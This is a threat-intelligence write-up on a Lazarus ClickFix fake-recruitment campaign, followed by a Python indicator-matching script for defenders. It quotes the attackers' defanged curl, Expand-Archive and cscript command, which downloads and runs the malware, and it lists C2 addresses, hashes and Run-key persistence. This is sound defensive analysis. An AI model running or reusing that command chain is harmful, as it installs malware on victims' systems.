The infamous Lazarus APT group has evolved its attack methodology by incorporating the increasingly popular ClickFix social engineering technique to distribute malware and steal sensitive intelligence data from targeted organizations.
This North Korean-linked threat actor, tracked internally as APT-Q-1 by security researchers, has shown remarkable adaptability by combining deceptive user-interface manipulation with its traditional espionage operations.
The ClickFix technique is a social engineering method in which attackers present victims with fabricated technical problems, then guide them through seemingly legitimate "fixes" that actually execute malicious code.
Lazarus has weaponized this technique within its established fake-recruitment campaign infrastructure, creating a multi-layered attack vector that combines job-opportunity lures with technical deception.
CN-SEC analysts identified this campaign through the discovery of a malicious batch script that downloads disguised NVIDIA software packages, which in turn deploy the group's signature BeaverTail information stealer.
The attack chain begins when victims are lured to fraudulent interview websites that prompt them to prepare their interview environment, eventually claiming that camera configuration issues require immediate resolution.
Phishing operation (Source – CN-SEC)
The technical sophistication of this operation extends beyond simple social engineering. Victims are presented with what appears to be a legitimate NVIDIA driver update command, but the underlying payload turns into a malicious execution sequence.
The primary infection vector is a one-line command that downloads a malicious ZIP archive from compromised infrastructure and extracts it with PowerShell.
Recent analysis reveals that the group has expanded its operations to target both Windows and macOS, demonstrating cross-platform capability through payloads tailored to each operating system architecture.
The Windows variant focuses on enterprise environments through Node.js-based deployment mechanisms, while the macOS versions use shell scripts built for both Apple Silicon and Intel processors.
Malware Deployment and Persistence Mechanisms
The core malware package, distributed as "nvidiaRelease[.]zip" (MD5: f9e18687a38e968811b93351e9fca089), contains several components designed for cross-platform compatibility and persistent access.
nvidiaRelease.zip contents (Source – CN-SEC)
The initial ClickFix-1.bat script executes the following command sequence:
curl -k -o "%TEMP%\nvidiaRelease[.]zip" https[:]//driverservices[.]store/visiodrive/nvidiaRelease[.]zip && powershell -Command "Expand-Archive -Force -Path '%TEMP%\nvidiaRelease[.]zip' -DestinationPath '%TEMP%\nvidiaRelease'" && cscript "%TEMP%\nvidiaRelease\run[.]vbs"
The extracted archive deploys run[.]vbs, which performs system reconnaissance to determine the Windows build number.
On Windows 11 systems (build 22000 or higher), the script additionally executes drvUpdate[.]exe, a sophisticated backdoor capable of command execution and file manipulation.
This binary establishes communication with a command-and-control server at 103.231.75.101:8888 and implements system information collection, remote command execution, and file transfer capabilities.
Core Malware Components:
| Component | MD5 Hash | Function |
|---|---|---|
| ClickFix-1[.]bat | a4e58b91531d199f268c5ea02c7bf456 | Initial payload downloader |
| nvidiaRelease[.]zip | f9e18687a38e968811b93351e9fca089 | Malicious archive package |
| run[.]vbs | 3ef7717c8bcb26396fc50ed92e812d13 | System reconnaissance script |
| main[.]js (BeaverTail) | b52e105bd040bda6639e958f7d9e3090 | Cross-platform information stealer |
| drvUpdate[.]exe | 6175efd148a89ca61b6835c77acc7a8d | Windows 11 backdoor |
The malware achieves persistence through registry modification, adding an entry to the Windows startup (Run) registry key so that it executes after every system reboot.
The BeaverTail component communicates with infrastructure at 45.159.248.110, providing a redundant command-and-control channel for maintaining long-term access to compromised systems.
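The download/unpack/execute chain in ClickFix-1.bat, the Run-key persistence, the component hashes in the table, and the two command-and-control addresses give a defender concrete things to hunt for. The script below is an added example, not code from the article or from CN-SEC: it runs those indicators over constructed, Sysmon-style event records (process creation, registry set, network connection) and reports every hit. The event schema, the hypothetical host "alice", the Run-key value name and the placeholder hashes of the benign processes are assumptions made for the example; the indicator values themselves come from the article. The domain in the sample command line is kept defanged as the article writes it.

```python
"""Indicator matching for the Lazarus ClickFix chain described in the article.

Added example: runs the article's indicators (component hashes, C2 endpoints,
the curl / Expand-Archive / cscript command chain, and Run-key persistence
under %TEMP%) over constructed, Sysmon-style event records.
"""
import re

# Indicators taken from the article's component table and C2 description.
KNOWN_HASHES = {
    "a4e58b91531d199f268c5ea02c7bf456": "ClickFix-1.bat",
    "f9e18687a38e968811b93351e9fca089": "nvidiaRelease.zip",
    "3ef7717c8bcb26396fc50ed92e812d13": "run.vbs",
    "b52e105bd040bda6639e958f7d9e3090": "main.js (BeaverTail)",
    "6175efd148a89ca61b6835c77acc7a8d": "drvUpdate.exe",
}
# (ip, port); port None means the article gives no port for that host.
C2_ENDPOINTS = {("103.231.75.101", 8888), ("45.159.248.110", None)}

# Behavioural pattern of ClickFix-1.bat: a curl download, PowerShell
# Expand-Archive, then cscript on the unpacked .vbs, chained with &&.
CHAIN_RE = re.compile(
    r"curl\b.*\s-o\s.*&&.*powershell.*expand-archive.*&&\s*cscript", re.I | re.S
)
RUNKEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
TEMP_PKG_RE = re.compile(r"(%TEMP%|\\AppData\\Local\\Temp\\).*nvidiaRelease", re.I)


def check_process(ev):
    """Process-creation record: known component hash or the download/unpack/run chain."""
    findings = []
    md5 = ev.get("md5", "").lower()
    if md5 in KNOWN_HASHES:
        findings.append(f"known hash {md5} ({KNOWN_HASHES[md5]}) for {ev['image']}")
    if CHAIN_RE.search(ev.get("cmdline", "")):
        findings.append("ClickFix curl/Expand-Archive/cscript chain in command line")
    return findings


def check_registry(ev):
    """Registry-set record: Run-key value pointing at the dropped package under %TEMP%."""
    if RUNKEY_RE.search(ev.get("key", "")) and TEMP_PKG_RE.search(ev.get("value", "")):
        return [f"Run-key persistence via {ev['key']} -> {ev['value']}"]
    return []


def check_network(ev):
    """Network record: connection to one of the article's C2 addresses."""
    for ip, port in C2_ENDPOINTS:
        if ev.get("dst_ip") == ip and (port is None or ev.get("dst_port") == port):
            return [f"connection to known C2 {ip}:{ev.get('dst_port')} from {ev.get('image')}"]
    return []


CHECKS = {"process": check_process, "registry": check_registry, "network": check_network}


def scan(events):
    """Return (event_index, finding) pairs for every event that hits an indicator."""
    hits = []
    for i, ev in enumerate(events):
        for finding in CHECKS.get(ev.get("type"), lambda _e: [])(ev):
            hits.append((i, finding))
    return hits


# Constructed sample events. The host "alice", the Run-key value name "NvidiaUpdate"
# and the all-zero / all-one hashes are placeholders, not indicators from the article.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "md5": "00000000000000000000000000000000",
     "cmdline": r"""cmd.exe /c curl -k -o %TEMP%\nvidiaRelease.zip https://driverservices[.]store/visiodrive/nvidiaRelease.zip && powershell -Command "Expand-Archive -Force -Path '%TEMP%\nvidiaRelease.zip' -DestinationPath '%TEMP%\nvidiaRelease'" && cscript %TEMP%\nvidiaRelease\run.vbs"""},
    {"type": "process", "image": r"C:\Users\alice\AppData\Local\Temp\nvidiaRelease\drvUpdate.exe",
     "md5": "6175EFD148A89CA61B6835C77ACC7A8D",  # logged upper-case; matched case-insensitively
     "cmdline": r"C:\Users\alice\AppData\Local\Temp\nvidiaRelease\drvUpdate.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NvidiaUpdate",
     "value": r"wscript.exe C:\Users\alice\AppData\Local\Temp\nvidiaRelease\run.vbs"},
    {"type": "network", "image": r"C:\Users\alice\AppData\Local\Temp\nvidiaRelease\drvUpdate.exe",
     "dst_ip": "103.231.75.101", "dst_port": 8888},
    {"type": "network", "image": r"C:\Program Files\nodejs\node.exe",
     "dst_ip": "45.159.248.110", "dst_port": 1224},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "md5": "11111111111111111111111111111111",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
    {"type": "network", "image": r"C:\Windows\System32\svchost.exe",
     "dst_ip": "8.8.8.8", "dst_port": 53},
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

The hash and address checks are exact matches and will age as the actor rotates infrastructure; the command-line and Run-key rules describe the behaviour of the chain (download into %TEMP%, unpack, launch a .vbs, persist from a temp directory) and remain useful after the specific indicators change. Hash values are lower-cased before lookup because Windows event sources vary in case.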